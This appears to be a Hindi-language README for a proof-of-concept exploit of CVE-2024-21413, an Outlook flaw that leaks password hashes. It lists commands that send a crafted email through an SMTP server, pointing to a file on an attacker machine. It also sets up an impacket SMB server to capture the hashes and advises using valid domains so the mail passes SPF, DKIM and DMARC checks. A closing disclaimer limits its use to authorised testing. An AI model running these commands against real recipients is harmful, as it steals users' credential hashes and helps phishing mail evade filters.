
Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - CVE-2024-21413 POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : हमलावर मशीन (xx.xx.xx.xx) से साझा की गई परीक्षण फ़ाइल (इस मामले में Word) है।
SPF, DKIM और DMARC अनुपालन सुनिश्चित करने के लिए, वैध $IP और डोमेन का उपयोग करें।
यदि आपने पहले से नहीं किया है, तो
pip install pexpectका उपयोग करके pexpect लाइब्रेरी इंस्टॉल करना सुनिश्चित करें।
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- बहुत-बहुत धन्यवाद और CVE-2024-21413 पर विवरण .
- वर्कअराउंड/फिक्स:
[!CAUTION] ⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और वैध उपयोग के लिए प्रदान की गई है। इसे किसी भी सिस्टम या नेटवर्क पर बिना स्पष्ट अनुमति के उपयोग न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुँच अवैध है, और अनधिकृत गतिविधियाँ करते पकड़े गए उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। लेखक इस स्क्रिप्ट के दुरुपयोग से हुए किसी भी नुकसान के लिए ज़िम्मेदार नहीं है..